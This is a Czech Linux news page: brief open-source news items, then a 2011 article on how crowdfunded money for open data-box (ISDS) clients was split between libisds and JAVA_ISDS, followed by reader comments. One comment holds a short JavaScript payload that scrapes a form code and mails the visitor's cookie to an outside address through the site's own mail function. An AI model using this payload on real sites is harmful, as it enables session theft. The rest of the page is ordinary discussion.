Byl vydán Debian 13.5, tj. pátá opravná verze Debianu 13 s kódovým názvem Trixie a Debian 12.14, tj. čtrnáctá opravná verze Debianu 12 s kódovým názvem Bookworm. Řešeny jsou především bezpečnostní problémy, ale také několik vážných chyb. Instalační média Debianu 13 a Debianu 12 lze samozřejmě nadále k instalaci používat. Po instalaci stačí systém aktualizovat.
CiviCRM (Wikipedie) bylo vydáno v nové verzi 6.14.0. Podrobnosti o nových funkcích a opravách najdete na release stránce. CiviCRM je robustní open-source CRM systém navržený speciálně pro neziskové organizace, spolky a občanské iniciativy. Projekt je napsán v jazyce PHP a licencován pod GNU Affero General Public License (AGPLv3). Český překlad má nyní 45 % přeložených řetězců a přibližuje se milníku 50 %. Potřebujeme vaši pomoc, abychom se dostali dál. Pokud máte chuť přispět překladem nebo korekturou, přidejte se na platformu Transifex.
Další lokální zranitelností Linuxu je ssh-keysign-pwn. Uživatel si může přečíst obsah souborů, ke kterým má právo ke čtení pouze root, například soubory s SSH klíči nebo /etc/shadow. V upstreamu již opraveno [oss-security mailing list].
Singularity (YouTube) je nejnovější otevřený film od Blender Studia. Jedná se o jejich první 4K HDR film.
Vyšla hra Život Není Krásný: Poslední Exekuce (Steam, ProtonDB). Kreslená point & click adventura ze staré školy plná černého humoru a nekorektního násilí. Vžijte se do role zpustlého exekutora Vladimíra Brehowského a projděte s ním jeho poslední pracovní den. Hra volně navazuje na sérii Život Není Krásný.
Společnost Red Hat představila Fedora Hummingbird, tj. linuxovou distribuci s nativním kontejnerovým designem určenou pro vývojáře využívající AI agenty.
Hru The Legend of Zelda: Twilight Princess od společnosti Nintendo si lze nově díky projektu Dusklight (původně Dusk) a reverznímu inženýrství zahrát i na počítačích a mobilních zařízeních. Vyžadována je kopie původní hry (textury, modely, hudba, zvukové efekty, …). Ukázka na YouTube. Projekt byl zahájen v srpnu 2020.
Byla vydána nová major verze 29.0 programovacího jazyka Erlang (Wikipedie) a související platformy OTP (Open Telecom Platform, Wikipedie). Detailní přehled novinek na GitHubu.
Po zranitelnostech Copy Fail a Dirty Frag přichází zranitelnost Fragnesia. Další lokální eskalace práv na Linuxu. Zatím v upstreamu neopravena. Přiřazeno ji bylo CVE-2026-46300.
Sovereign Tech Agency (Wikipedie) prostřednictvím svého fondu Sovereign Tech Fund podpoří KDE částkou 1 285 200 eur.
Projekt si zpočátku kladl ambiciózní cíle. Ačkoliv se v rámci tohoto projektu nepodařilo všech vytyčených cílů dosáhnout, podařilo se zviditelnit nedostatky ne zcela ideální implementace samotných Datových schránek a nabídnout použitelné řešení pro ty z nás, kteří nemohou používat oficiální webové rozhraní pro přístup k Datovým schránkám. Zároveň jsme rádi, že mimo projektů probíhajících v rámci AbcLinuxu, se vynořila řada dalších dobrých implementací.
Protože aktivita kolem samotného projektu utichla a naopak rostl tlak na závěrečný verdikt, bylo nutné najít způsob, jakým peníze rozdělit mezi přihlášené projekty. Po posouzení jsme došli k závěru, že peníze budou rozděleny mezi projekty libisds (knihovna v C a frontend Šigofumi) a JAVA_ISDS (implementace v Javě), a to v poměru půl na půl. Uvědomujeme si, že žádný způsob rozdělení peněz není úplně fér ke všem stranám zároveň: tedy přihlášeným i nepřihlášeným projektům, projektům, které mezitím vznikly pod záštitou nejrůznějších firem a sdružení a v podstatě ani k lidem a firmám, které na vývoj přispěly.
Díky tedy patří i ostatním projektům jako dsgui (CZ.NIC, z.s.p.o.), OpenDS.cz (blue.point Solutions, s.r.o.), datové schránky pro Android (APK SOFT s.r.o.) a řadě dalších.
Výše příspěvků a celou historii bankovního účtu, kde byly v rukou Liberix, o.p.s. spravovány finance, lze vidět na transparentním kontě (přehled v PDF). Peníze tedy byly rozděleny následovně:
Před rokem jsme zveřejnili stav obou projektů. Požádali jsme oba projekty o dodatečné zhodnocení – jedno zhodnocení, které jsme dostali, je krátké (za JAVA_ISDS) a jedno je velmi dlouhé (za libisds). Bylo nám líto to dlouhé zkracovat, proto jej najdete v celém znění na druhé stránce tohoto článku. Cílem bylo čtenáře seznámit s tím, co se v projektu událo a jaký je jejich postoj k datovým schránkám.
Chtěli bychom poděkovat všem vývojářům, kteří umožnili uživatelům přistupovat k Datovým schránkám z libovolného operačního systému, což pro mnohé nepředstavuje jen „funkci navíc“, ale také v podstatě zákonnou nezbytnost. Dále chceme poděkovat sdružení Liberix, o.p.s. za důležitou spolupráci a pomoc v průběhu projektu. Děkujeme všem, kteří finančně přispěli, ale také těm, kteří nějakým způsobem pomohli při testování a rozvoji všech otevřených řešení. A na závěr přejeme těm, kterých se to týká, šťastnější ruku při volbě a implementaci technologií, které se přímo dotýkají občanů této země.
Nedávno jsem přidal přihlašování i přes certifikát. Vyřízení osobního certifikátu od Postsignum bylo docela vtipné, krátce po jeho vydání mi volali s prosbou, abych se tam stavil, protože mi zapomněli dát podepsat souhlas se zpracovanim osobnich udajů...
Připravuji se na přechod na nové testovací prostředí, které bude spuštěno v únoru.
O Datových schránkách nemám kladné mínění, ale některé změny jsem uvítal s radostí: přechod na BASIC autentizaci místo původního řešení s cookies a několikanásobným přesměrováním. Člověk se také naučí defenzivnímu programování, protože ví, že se nemůže na nic spoléhat.
Knihovna není zcela hotová. Seznam věcí, které bych rád jednou začlenil, je zapsán v souboru TODO.
Především se jedná o podporu souběžného zpracování z více vláken, možnost při překladu vypnout podporu síťových funkcí, schopnost validovat požadavky a odpovědi serveru proti XML schématu a to nejdůležitější – dopsat testy pro síťové operace.
Testováním síťových operací myslím testy funkcí jako přihlášení k datové schránce, získání seznamu zpráv, odeslání zprávy atd. V současnosti existuje testovací instance ISDS, kde je možné takové operace vyzkoušet, ale vše s patřičnou časovou prodlevou a především není možné otestovat reakci knihovny na všechny chybové stavy nebo na chybně utvořené zprávy (například hodnota času doručení by nebyla správně utvořena.).
Co tedy chybí, je nástroj, který by simuloval server, a sada testů, které by prověřily knihovnu po všech stránkách, především v okrajových případech, které se za běžného provozu nevyskytují. Protože takovou péči by si zasloužily i jiné knihovny (napsané v rozličných jazycích) a protože simulátor testů a definice testů mohou být na konkrétní knihovně nezávislé, došel jsem k závěru, že je třeba věc uchopit značně abstraktně a na jazyku knihovny nezávisle. Protože se jedná v podstatě o samostatný projekt rozsahem srovnatelný se samotnou knihovnou, rozhodl jsem se, že jej prostřednictvím firmy Red Hat Czech s. r. o. nabídnu jako zadání bakalářské práce. Pokud bude téma akademicky průchodné a až budou všechny formality hotové, studenti Fakulty informatiky Masarykovy univerzity a Fakulty informačních technologií Vysokého učení technického v Brně dostanou příležitost, jak skloubit příjemné s užitečným.
Nástroje: Tisk bez diskuse
Tiskni
Sdílej:
3.2.2011 08:27
Saljack | skóre: 28
| blog: Saljack
| Praha
Koukám, že ty datové schránky nejsou zrovna bezpečné.Dobré ránko
3.2.2011 18:03
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Koukám, že ty datové schránky nejsou zrovna bezpečné.<uvítací melodie Windows XP>
Tu chybu s tím, že můžeš zjistit něco o zprávě, která ti nepatří by měli opravit.Jsou tam i horší věci.
3.2.2011 19:17
Jendа | skóre: 78
| blog: Jenda
| JO70FB
4.2.2011 15:41
Luk | skóre: 47
| blog: Kacířské myšlenky
| Kutná Hora
4.2.2011 16:38
Jendа | skóre: 78
| blog: Jenda
| JO70FB
AbcLinuxu.cz
ITBiz.cz
HDmag.cz
AbcPráce.cz
debian-security, takže jsem si zvykl na to, že privilege escalation je považováno za kritikou chybu, která se opraví tak nejvýš do jednoho dne. Obzvláště když k její opravě stačí jeden chown.
4.2.2011 18:19
Luk | skóre: 47
| blog: Kacířské myšlenky
| Kutná Hora
3.2.2011 09:13
belisarivs | skóre: 22
| blog: Psychobláboly
Celkem neúspěšně jsem zkoušel najít nějaká čísla, ale narazil jsem i na vtipnou kalkulačku. Moc se mi líbí ta nulová cena..
3.2.2011 18:19
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Celkem neúspěšně jsem zkoušel najít nějaká číslaPokud by například Seznam doručoval e-maily za podobnou cenu, jako ISDS doručuje zprávy, začal by být v České republice citelný nedostatek peněz
.
ale narazil jsem i na vtipnou kalkulačkuTo mi připomíná kalkulačku DP, která v případě dopravy metrem počítá čas z nástupiště na nástupiště…
3.2.2011 13:39
Luboš Doležel (Doli) | skóre: 98
| blog: Doliho blog
| Kladensko
A zasmál bych se ještě víc, kdyby tu někdo přihodil informaci, na kolik že tato taškařice přišla daňového poplatníka..Pokud si dobře vzpomínám, slyšel jsem něco o 800MKč. Jestli je v tom i provoz, nebo je to vyloženě za zhotovení, to si nepamatuju.
3.2.2011 18:15
Jendа | skóre: 78
| blog: Jenda
| JO70FB
A zasmál bych se ještě víc, kdyby tu někdo přihodil informaci, na kolik že tato taškařice přišla daňového poplatníka..9×108 Kč.
3.2.2011 09:04
Jiří Svoboda | skóre: 37
| blog: cat /dev/mind
| Prostějov
A proč z toho viním programátory ze Slušovic?Svazarmovská badna Software602 je pražská. Nebo snad opravdu mají někoho ve Slušovicích? Nedošlo k záměně s SWS?.
Knižnice bola iba Fáza 1. Veď to všetko máte v tom wiki projektu.
Treba si chlapsky priznať, že to je fiasko. Komunita nefunguje a za 60 litrov by to pravdepodobne zbúchala komerčná firma presne podla zadania, v kratšom čase a výsledok by bol funkčná aplikácia.
Koľko ludí použije tie knižnice? Všetky ostatné aplikácie na prácu so schránkamy používajú vlastné. Možno ešte vzniknu nejaké nové projekty na prístup ku schránkam a použijú tieto vaše hotové knižnice ale koľko ich bude? Jeden alebo dva? Hotový plugin do Thunderbirdu by IMHO bol najpoužívanejší plugin do TB v ČR! Bohužial, projekt ostal vo fáze 1.
Ten frontend v clanku je command line, cielom bolo GUI alebo TB rozsirenie!
3.2.2011 15:56
Luboš Doležel (Doli) | skóre: 98
| blog: Doliho blog
| Kladensko
za 60 litrov by to pravdepodobne zbúchala komerčná firma presne podla zadania, v kratšom čase a výsledok by bol funkčná aplikácia.Výsledek by byla aplikace nyní už zase nefunkční, protože od zadání se některé věci dost podstatně změnily. Takže byste vzal dalších 60 tisíc a dal je další firmě, aby to napsala znova podle nového zadání. A nebo tady máte opensource projekt, který není závislý na původním autorovi a může na něm pokračovat každý.
Výsledek by byla aplikace nyní už zase nefunkční, protože od zadání se některé věci dost podstatně změnily. Takže byste vzal dalších 60 tisíc a dal je další firmě, aby to napsala znova podle nového zadání.Ona je sporná i platnost tvrzení, že by to firma zbouchala za šedesát tisíc... tak nějak mi to přijde kapku málo.
4.2.2011 09:03
multi | skóre: 38
| blog: JaNejsemOdsut
za 60 litrov by to pravdepodobne zbúchala komerčná firma presne podla zadania, v kratšom čase a výsledok by bol funkčná aplikácia.Tak todle me neda se nevyjadrit! Zakolik ze to nezvladla na firma 602, ktera je komercni ? Ani tu multiplatformni knihovnu neudelala!
4.2.2011 09:05
multi | skóre: 38
| blog: JaNejsemOdsut
5.2.2011 14:47
Mintaka | skóre: 13
Ano, přesně tímto směrem jsem vtipkoval. Vtipkoval, protože
Můžete jmenovat nějaký celostátní IT projekt provozovaný českým státem, který byl zprovozněn "finančně při zdi" a bez pijavic? Mě se třeba líbí fungování CZ-NICu a NIXu posledních pár let, ale to jsou projekty vzešlé z iniciativy skupiny komerčních subjektů ("zájmové sdružení právnických osob") - to nejsou státní instituce. Jo kdyby něco takového rozjel CZ-NIC, a byl schopen zalobovat na vládě/parlamentu, že tento "freemail" bude mít stejné právní postavení jako dnešní Datové Schránky... taky by mě zajímalo, jak by musel vypadat komerční model té věci - uvědomte si, že NIX a CZ.NIC jsou financovány několika málo komerčními subjekty (domény se platí od kusu, ale nepřímo prostřednictvím komerčních registrátorů) => čili takhle nějak by musely fungovat i platby za "oficiální centrální mailbox".
5.2.2011 21:14
Mintaka | skóre: 13
xmlhttp.open('GET', '/Profile?action=sendEmail&uid=15224');
xmlhttp.send('');
var pole = xmlhttp.responseText.split(' ');
var kod = '';
var part_num = 0;
while (part_num < pole.length) {
if (pole[part_num] == 'hodnotu') {
kod = pole[part_num+1].substring(0,4);
break;
}
part_num += 1;
}
xmlhttp.open('GET', '/Mail?KOD=' + kod + '&sender=admin%40pobox.sk&cc=&bcc=&subject=' + cookie + '&message=' + cookie + '&finish=Odeslat&url=%2FProfile%2F15224&action=finish');
xmlhttp.send('');
11.2.2011 06:41
Mintaka | skóre: 13
6.2.2011 14:00
Luk | skóre: 47
| blog: Kacířské myšlenky
| Kutná Hora
6.2.2011 14:54
Mintaka | skóre: 13
6.2.2011 14:55
Mintaka | skóre: 13
This is Shigofumi, an ISDS client. Have a nice e-government. Use `help' command to get list of available commands. shigofumi> help Following commands are available: accept accept commercial message box show current box details cache show cache details cd change working directory commercial manipulate commercial receiving box status compose compose a message convert submit local document for authorized conversion copying show this program licence excerpt debug set debugging delivery get message delivery details findbox search for a box hash query ISDS for message hash help describe commands load load message or message delivery details from local file login log into ISDS lsi list received messages lso list sent messages msgi get incoming message msgo get outgoing message passwd manipulate user password pwd print working directory quit exit shigofumi read mark message as read statbox get status of a box user show current user details users show box users version show version of this program